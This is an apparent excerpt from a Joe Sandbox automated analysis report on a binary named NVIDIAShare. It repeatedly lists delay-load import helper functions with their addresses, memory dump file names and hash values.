Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 44fb098375c0c5ba334f77bbd8a0a03b44304a7d0c22e9a2c20088e55b20671b
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0fd600838f9711b585ba1f0e32883f8e723eff053ffe7d04b50367a7a8136ec2
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 0fd600838f9711b585ba1f0e32883f8e723eff053ffe7d04b50367a7a8136ec2
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1eb2c4c79e9c3e2c0c3dac93f0bf829b20b41de8a1a41f41e9a7b005441857e1
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 1eb2c4c79e9c3e2c0c3dac93f0bf829b20b41de8a1a41f41e9a7b005441857e1
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 45c6e2d182267d78bdf7af9f86a15fb3a99585c7fc514e732f3d3f6d89855fe8
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 45c6e2d182267d78bdf7af9f86a15fb3a99585c7fc514e732f3d3f6d89855fe8
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 872f735582d6b4ed508a1fa0931d0746c347efddaaea331264870ef32d5358a0
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 872f735582d6b4ed508a1fa0931d0746c347efddaaea331264870ef32d5358a0
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 041501e421993cbd24492b5ba323471598ffec1963f7d3cb79ab16f3d780a845
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 041501e421993cbd24492b5ba323471598ffec1963f7d3cb79ab16f3d780a845
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c25cdcf0b3159602ebda62effb6f14a2bbc333c85f38c0c28afa335b3df1e3d5
Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
Opcode Fuzzy Hash: c25cdcf0b3159602ebda62effb6f14a2bbc333c85f38c0c28afa335b3df1e3d5
Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430

Function 0101E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e8c931bcaffb5d7f31d46fe1db676df85e6d94d98e66364bea7a697f99d831e5
Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
Opcode Fuzzy Hash: e8c931bcaffb5d7f31d46fe1db676df85e6d94d98e66364bea7a697f99d831e5
Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430

Function 0101E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 682026b8a93d750a6f76b4eb366f11d3b851e653df1877cd5c78e4b212d55cc0
Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
Opcode Fuzzy Hash: 682026b8a93d750a6f76b4eb366f11d3b851e653df1877cd5c78e4b212d55cc0
Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430

Function 0101E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b1941d85eb7029311e5374e4454da15176b6e4c6f080adbd8746da362472eebe
Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
Opcode Fuzzy Hash: b1941d85eb7029311e5374e4454da15176b6e4c6f080adbd8746da362472eebe
Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430

Function 0101E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E580

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c3009052681cb4fe34ffedd3df419aed7df44978b7edfe149079594866819cf9
Instruction ID: 89c26a5c292a286f63e2603ca45ee87d394c32d3c574eab7931c15f34ef57e62
Opcode Fuzzy Hash: c3009052681cb4fe34ffedd3df419aed7df44978b7edfe149079594866819cf9
Instruction Fuzzy Hash: 55A024C15D41013C31051171DD01C3F310CC5D0D11330411FFCC4D40447C441C010430

Function 0101E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E580

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f1269bb9aea21e3fb017ae7978f8e658535360b9736b1d0bd60148697a477fce
Instruction ID: 70260e9c02718b751d92c92482ac81e99fdcac753987d2acba6f751e5cbfa044
Opcode Fuzzy Hash: f1269bb9aea21e3fb017ae7978f8e658535360b9736b1d0bd60148697a477fce
Instruction Fuzzy Hash: ECA024C155C1037C31051151DD01C3F310CC5C4D10330441FFCC5C40447C441C010430

Function 0101E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E580

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 052e7c27bde04693a42f3ccfd863e322de2353411cb5fdb100c99cc7290fbe8f
Instruction ID: 70260e9c02718b751d92c92482ac81e99fdcac753987d2acba6f751e5cbfa044
Opcode Fuzzy Hash: 052e7c27bde04693a42f3ccfd863e322de2353411cb5fdb100c99cc7290fbe8f
Instruction Fuzzy Hash: ECA024C155C1037C31051151DD01C3F310CC5C4D10330441FFCC5C40447C441C010430

Function 0101E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7f986950e675d9268b2ff1ba1a43e13ed2dcf6b077fb993624ee12dd9de0f6b1
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: 7f986950e675d9268b2ff1ba1a43e13ed2dcf6b077fb993624ee12dd9de0f6b1
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Function 0101E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0fca4b5a8eb2dadc990c60b72f38773de602d3ef6120de24d2fa20a74a24a50b
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: 0fca4b5a8eb2dadc990c60b72f38773de602d3ef6120de24d2fa20a74a24a50b
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Function 0101E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b952171228d710f5548ca753f7af7b04102912a81dbb01e154d8fc2b5211550f
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: b952171228d710f5548ca753f7af7b04102912a81dbb01e154d8fc2b5211550f
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Function 0101E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2316f976ebd558bfefc6c5d2b13a5a581e081a47cfd271eab90a06eb3742c35e
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
